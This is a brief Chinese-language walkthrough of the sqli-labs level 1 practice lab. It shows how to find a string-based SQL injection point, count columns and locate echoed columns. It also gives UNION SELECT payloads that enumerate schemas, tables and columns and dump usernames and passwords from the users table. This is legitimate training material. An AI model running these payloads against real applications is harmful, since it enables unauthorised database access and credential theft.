sqli-labs-1

打开网站

存在参数id 测试注入点

判断什么类型注入

使用3-2数学表达式测试为字符型、结果显示的是id=3的结果，如果是数字型结果应该为id=1的结果

使用 or 或者 and 测试注入点

判断列数和回显的位置

当order by 4时，回显列数不正确，说明列数为3

使用union select 1,2,……n测试回显第几列
结果显示回显第2、3列

回显数据库版本、用户、数据库等信息

尝试回显information_schema数据库中的信息

先获取数据库信息、数据库表名信息、表的列名信息、最后成功显示出表中的信息

?id=-1' union select 1,2,group_concat(schema_name) from information_schema.schemata %23 //枚举数据库
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = 'security' %23 //枚举数据库所有表名
?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' %23  //枚举users表中的所有列名
?id=-1' union select 1,2,group_concat(concat(username,0x7e,password))from users %23//枚举出所有的username和password,并用~分割开

2.

3.

4. 使用concat（username,'密码：',password）函数分隔每一个用户名密码对